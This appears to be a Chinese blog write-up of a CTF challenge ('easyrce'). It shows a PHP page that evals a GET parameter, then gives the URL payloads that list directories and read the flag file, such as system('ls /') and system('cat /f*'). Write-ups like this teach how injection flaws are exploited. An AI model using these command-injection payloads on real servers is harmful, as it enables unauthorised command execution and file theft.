当前位置: 首页 > news >正文

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easyrce解析

news 来源:原创 2024/4/29 13:24:36

先看网页

代码审计:

error_reporting(0); :关闭报错,代码的错误将不会显示

highlight_file(__FILE__); :将当前文件的源代码显示出来

eval($_GET['url']); :将url的值作为php代码执行

解题:

题目既然允许我们自己输入代码,那我们就先ls查看文件

http://node5.anna.nssctf.cn:28422/?url=system('ls');

注意,因为eval函数是把url的值当成php代码,所以记得遵守php代码的书写规范,在最后加个分号:

可以看到只有一个index.php,那我们尝试往它的父目录找flag

http://node5.anna.nssctf.cn:28422/?url=system('cd ../;ls');

没有flag,再往上

http://node5.anna.nssctf.cn:28422/?url=system('cd ../../;ls');

没有,再往上

http://node5.anna.nssctf.cn:28422/?url=system('cd ../../../;ls');

有了,我们直接打开flag

http://node5.anna.nssctf.cn:28422/?url=system('cd ../../../;ls;cat flllllaaaaaaggggggg');

这样就得到flag了。

其实这道题快的话可以运用如下payload

http://node5.anna.nssctf.cn:28422/?url=system('ls /');
其中system('ls /');是列出根目录的文件,这道题的flag正好在根目录上
http://node5.anna.nssctf.cn:28422/?url=system('cat /f*');
其中system('cat /f*');是查看文件系统中以f开头的文件

相关文章:

  • springboot集成elasticsearch
  • MySQL 基础知识(五)之数据增删改
  • K8sGPT 的使用
  • 03、全文检索 -- Solr -- Solr 身份验证配置(给 Solr 启动身份验证、添加用户、删除用户)
  • 速盾:海外服务器用了cdn还是卡怎么办
  • 【FTP讲解】
  • 安卓价值1-如何在电脑上运行ADB
  • 【Linux学习】生产者-消费者模型
  • Day 44 | 动态规划 完全背包、518. 零钱兑换 II 、 377. 组合总和 Ⅳ
  • 使用Xdisplay将ipad作为扩展显示器Agent闪退问题
  • openstack(T版)公有云--Dashboard服务
  • whisperspeech 英文TTS的实现
  • Python学习之路-爬虫进阶:爬虫框架
  • 11.JavaScript 中如何进行隐式类型转换?
  • 2024年华为OD机试真题-计算面积-Python-OD统一考试(C卷)
  • JavaScript-如何实现克隆(clone)函数
  • 002-读书笔记-JavaScript高级程序设计 在HTML中使用JavaScript
  • 2019年如何成为全栈工程师?
  • LintCode 31. partitionArray 数组划分
  • 大快搜索数据爬虫技术实例安装教学篇
  • 构造函数(constructor)与原型链(prototype)关系
  • 机器学习学习笔记一
  • 前端相关框架总和
  • 前端性能优化--懒加载和预加载
  • 嵌入式文件系统
  • 实现简单的正则表达式引擎
  • 实战|智能家居行业移动应用性能分析
  • 微信小程序开发问题汇总
  • 云大使推广中的常见热门问题
  • FaaS 的简单实践
  • # Panda3d 碰撞检测系统介绍
  • #NOIP 2014#Day.2 T3 解方程
  • $分析了六十多年间100万字的政府工作报告,我看到了这样的变迁
  • (04)odoo视图操作
  • (C)一些题4
  • (Redis使用系列) SpringBoot中Redis的RedisConfig 二
  • (二)Linux——Linux常用指令
  • (免费领源码)Java#ssm#MySQL 创意商城03663-计算机毕业设计项目选题推荐
  • (十二)python网络爬虫(理论+实战)——实战:使用BeautfulSoup解析baidu热搜新闻数据
  • (一)Neo4j下载安装以及初次使用
  • (终章)[图像识别]13.OpenCV案例 自定义训练集分类器物体检测
  • (转)拼包函数及网络封包的异常处理(含代码)
  • .NET CF命令行调试器MDbg入门(二) 设备模拟器
  • .NET LINQ 通常分 Syntax Query 和Syntax Method
  • .NET MVC第五章、模型绑定获取表单数据
  • .NET/C# 使用 #if 和 Conditional 特性来按条件编译代码的不同原理和适用场景
  • .NetCore 如何动态路由
  • .NET开源快速、强大、免费的电子表格组件
  • .NET序列化 serializable,反序列化
  • @EnableAsync和@Async开始异步任务支持
  • [ vulhub漏洞复现篇 ] Apache APISIX 默认密钥漏洞 CVE-2020-13945
  • [ASP.NET MVC]Ajax与CustomErrors的尴尬
  • [CareerCup] 17.8 Contiguous Sequence with Largest Sum 连续子序列之和最大
  • [EFI]Atermiter X99 Turbo D4 E5-2630v3电脑 Hackintosh 黑苹果efi引导文件
  • [idea]关于idea开发乱码的配置